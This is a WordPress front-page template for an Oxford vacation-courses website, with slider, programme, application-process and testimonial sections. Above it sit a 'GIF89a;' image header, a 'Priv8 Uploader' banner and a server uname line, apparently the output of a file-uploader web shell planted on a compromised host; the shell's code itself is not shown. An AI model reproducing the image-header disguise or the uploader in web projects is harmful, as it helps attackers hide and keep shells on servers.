GIF89a;
Priv8 Uploader By InMyMine7
Linux server.abcbiz.in 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
<?php
/**
* Template Name: Home Page
* The front page template file
*
* If the user has selected a static page for their homepage, this is what will
* appear.
* Learn more: https://developer.wordpress.org/themes/basics/template-hierarchy/
*
* @package WordPress
* @subpackage Twenty_Seventeen
* @since Twenty Seventeen 1.0
* @version 1.0
*/
get_header(); ?>
<section class="slider-container">
<div class="container-fluid">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-9 col-lg-9 pdnone">
<div id="myCarousel" class="carousel slide" data-ride="carousel">
<!-- Indicators -->
<ol class="carousel-indicators">
<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
<li data-target="#myCarousel" data-slide-to="1"></li>
</ol>
<div class="carousel-inner">
<div class="item active ms-slide slide-1" data-delay="5">
<img src="<?php echo get_template_directory_uri(); ?>/images/slider1.jpg" alt=""/>
<div class="banner-text fadeInDownBig animated">
<h6 class="text-white"><span>We at</span> vacation <br> courses <span>provide <br> enrichment <br>programmes</span></h6>
<a class="btn sbut3 btn-yellow" href="<?php echo home_url();?>"> On Campus </a>
<a class="btn sbut3" href="<?php echo home_url();?>/virtual-campus"> Virtual Courses</a>
</div>
</div>
<div class="item ms-slide slide-1" data-delay="5">
<img src="<?php echo get_template_directory_uri(); ?>/images/slider3.jpg" alt=""/>
<div class="banner-text fadeInUpBig animated">
<h6 class="text-white"><span>We at</span> vacation <br> courses <span>provide <br> enrichment <br>programmes</span></h6>
<a class="btn sbut3 btn-yellow" href="<?php echo home_url();?>"> On Campus </a>
<a class="btn sbut3" href="<?php echo home_url();?>/virtual-campus"> Virtual Courses</a>
</div>
</div>
</div>
<!-- Left and right controls -->
<a class="left carousel-control" href="#myCarousel" data-slide="prev">
<span class="fa fa-angle-left"></span>
<span class="sr-only">Previous</span>
</a>
<a class="right carousel-control" href="#myCarousel" data-slide="next">
<span class="fa fa-angle-right"></span>
<span class="sr-only">Next</span>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-3 col-lg-3 pdnone">
<div class="right-slider-txt">
<h5><span>Sample</span> day schedule</h5>
<ul>
<li>Day Time Activities </li>
<li>Weekend Trips</li>
<li>Accommodation </li>
</ul>
<a href="<?php echo home_url();?>">Know More <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
</div>
</div>
</section>
<?php
// Start the Loop.
while ( have_posts() ) : the_post();?>
<section class="vacation-section">
<div class="container">
<div class="row">
<div class="col-md-offset-2 col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="vacation-area">
<?php the_content();?>
<a href="<?php echo home_url();?>/about-us">Know More <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
</div>
</div>
</section>
<?php endwhile;?>
<section class="programmes-section">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
<div class="programmes-area">
<h6>Programmes</h6>
<p>We are proud to offer our students best experience in colleges in Oxford and London Universities. We offer range of programmes for our students during their vacation. Our popular programmes run over holidays in summer and fall. We are happy to offer interested schools and colleges tailored programmes during their school holidays.</p>
<div>
<a class="programmesbtn" href="<?php echo home_url();?>/programe/art-drama-photography">Know More <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="images-box">
<div class="row">
<?php
$args=array('post_type'=>'acme_programe','posts_per_page'=>10);
$loop=new WP_Query($args);
while($loop->have_posts()):$loop->the_post();
$featuredImages = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'full' );
?>
<div class="col-xs-12 col-sm-6 col-md-6 col-lg-6">
<a href="<?php the_permalink();?>">
<?php $image = get_field('home_image'); if( !empty($image) ): ?><div class="hovereffect">
<div class="item-txt">
<h6> <?php the_title(); ?></h6>
</div>
<div class="img-item">
<img src="<?php echo $image['url']; ?>" alt="">
<div class="overlay"></div>
</div>
</div>
<?php endif; ?>
</a>
</div>
<?php endwhile;?>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="application-section">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
<div class="application-area">
<h6><span>Application</span> Process</h6>
</div>
<div class="application-img">
<img src="<?php echo get_template_directory_uri(); ?>/images/application-img.png" alt="">
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4">
<div class="application-txt">
<p>There is no final date for the application, but we recommend you apply at your earliest to secure your place in our popular programmes.</p>
<a href="http://vacationcourses.co.uk/application/documentations/">Know More <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="row mt14 hidden-xs hidden-sm">
<div class="col-xs-12 col-sm-6 col-md-4 col-lg-4 col-md-offset-2 col-md-offset-33 mr22">
<div class="triangle-down">
<a href="http://vacationcourses.co.uk/application/payment/">
<div class="traiangle-txt zoom1">
<h6>Payment</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/payment-icon.png" alt="">
<p>2</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-5 col-md-4 col-lg-4">
<div class="triangle-down col-md-offset-34">
<a href="http://vacationcourses.co.uk/application/transportation/">
<div class="traiangle-txt-1 zoom1">
<h6>Transportation</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/transportation.png" alt="">
<p>4</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-4 col-md-4 col-lg-4">
<div class="triangle-up">
<a href="http://vacationcourses.co.uk/application/documentations/">
<div class="traiangle-txt-2 zoom1">
<p>1</p>
<img src="<?php echo get_template_directory_uri(); ?>/images/documentations.png" alt="">
<h6>Documentations</h6>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-4 col-md-4 col-lg-4">
<div class="triangle-up ml10 zoom1">
<a href="http://vacationcourses.co.uk/application/insurance/">
<div class="traiangle-txt-2 ml10">
<p>3</p>
<img src="<?php echo get_template_directory_uri(); ?>/images/insurance.png" alt="">
<h6>Insurance</h6>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-4 col-md-4 col-lg-4">
<div class="triangle-up ml20">
<a href="http://vacationcourses.co.uk/application/international-applications/">
<div class="traiangle-txt-2 ml20 zoom1">
<p>5</p>
<img src="<?php echo get_template_directory_uri(); ?>/images/international.png" alt="">
<h6>International applications</h6>
</div>
</a>
</div>
</div>
</div>
<div class="row mt14 mobileview hidden-md hidden-lg hidden-xl">
<div class="col-xs-12 col-sm-4 col-md-offset-34">
<div class="triangle-down">
<a href="http://vacationcourses.co.uk/application/documentations/">
<div class="traiangle-txt zoom1">
<h6>Documentations</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/documentations-black.png" alt="">
<p>1</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-4">
<div class="triangle-down col-md-offset-34">
<a href="http://vacationcourses.co.uk/application/payment/">
<div class="traiangle-txt-1 zoom1">
<h6>Payment</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/payment-icon.png" alt="">
<p>2</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-4 col-md-offset-34">
<div class="triangle-down">
<a href="http://vacationcourses.co.uk/application/insurance/">
<div class="traiangle-txt zoom1">
<h6>Insurance</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/insurance-black.png" alt="">
<p>3</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-6">
<div class="triangle-down col-md-offset-34">
<a href="http://vacationcourses.co.uk/application/transportation/">
<div class="traiangle-txt-1 zoom1">
<h6>Transportation</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/transportation.png" alt="">
<p>5</p>
</div>
</a>
</div>
</div>
<div class="col-xs-12 col-sm-6 col-md-offset-34">
<div class="triangle-down">
<a href="http://vacationcourses.co.uk/application/international-applications/">
<div class="traiangle-txt zoom1">
<h6>International applications</h6>
<img src="<?php echo get_template_directory_uri(); ?>/images/international-black.png" alt="">
<p>6</p>
</div>
</a>
</div>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="experience-section">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12 col-md-6 col-lg-6">
<div class="info-box">
<div class="text">
<h3> What do we offer?</h3>
<ul>
<li>Vacation courses in Oxford with hands-on work experience within UK.</li>
</ul>
</div>
</div>
<div class="info-box mt30">
<div class="text">
<h3> Where and When?</h3>
<ul>
<li>During your school holidays (summer and Fall).</li>
<li> These are academic enrichment courses with hands-on work experience in various subjects.</li>
<li> Residential courses at the Oxford Universities dormitory.</li>
<li>With choices of day activities and weekend excursion in UK.</li>
</ul>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-6 col-lg-6">
<div class="info-box p32">
<div class="text">
<h3> Who is it for?</h3>
<ul>
<li>Are you aged 13 to 24 years?</li>
<li>Preparing to join secondary school, sophomore year, high school, college, GCSE, IGCSE, AS/A2, IB, foundation, or in your Gap year?</li>
<li>Planning to take up a career in Science, Biomedicine, Dentistry, medicine, Engineering, arts and photography, social sciences, Business, Marketing , Economics.</li>
<li>Do you need to have a hands – on work experience to enhance your skills, CV, Personal statement and add this experience to your bucket list?</li>
<li>Do you wish to experience Oxford University, student life in the UK? </li>
</ul>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="testimonial-section">
<div class="container">
<div class="row">
<div class=" col-xs-12 col-sm-12 col-md-4 col-lg-4">
<div class="testimonial-head">
<h6># Testimonial</h6>
</div>
</div>
<div class=" col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-icon.png" alt="">
<p>“Drew is thoroughly enjoying everything about the program! He has been super excited and has sent us so many photos when he is a very shy person otherwise. He is very pleased with the hands- on exposure that is unique to your courses. He finds it very useful in grasping...<a href="<?php echo home_url();?>/testimonial">more <i class="fa fa-angle-right"></i></a></p>
<div class="customer-txt">
<h5><span><img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-img.png" alt=""></span> <span>Parent from</span> Japan, 2019</h5>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-icon.png" alt="">
<p>"Sri has been inspired with the Medical teaching and stimulations; she has expressed strong interest of becoming a Doctor. We are very happy that a hands-on approach was used which has given Sri a perspective to the tasks involved in Medicine. We both are practicing Physicians...<a href="<?php echo home_url();?>/testimonial">more <i class="fa fa-angle-right"></i></a> </p>
<div class="customer-txt">
<h5><span><img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-img.png" alt=""></span> <span>Parent from</span> Singapore, 2019</h5>
</div>
</div>
</div>
<div class="clearfix"></div>
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4 hidden-sm hidden-xs">
<div class="testimonial-head">
<a class="" href="<?php echo home_url();?>/testimonial">View All Testimonials <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
<div class=" col-xs-12 col-sm-12 col-md-8 col-lg-8">
<div class="testimonial-txt">
<img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-icon.png" alt="">
<p>“Jaz has had an experience of his life-time. He has been very pleased to be given award for his performance at the Vacation courses. We are very proud of his achievement and are pleased to inform that due to this award from Oxford he has now been offered higher education in Boston...<a href="<?php echo home_url();?>/testimonial">more <i class="fa fa-angle-right"></i></a></p>
<div class="customer-txt">
<span><img src="<?php echo get_template_directory_uri(); ?>/images/testimonial-img.png" alt=""></span>
<h5> <span>Parent from</span> India, 2018</h5>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-12 col-md-4 col-lg-4 hidden-md hidden-lg hidden-xl">
<div class="testimonial-head">
<a class="" href="<?php echo home_url();?>/testimonial">View All Testimonials <i class="fa fa-long-arrow-right"></i></a>
</div>
</div>
</div>
</div>
</section>
<?php
get_footer();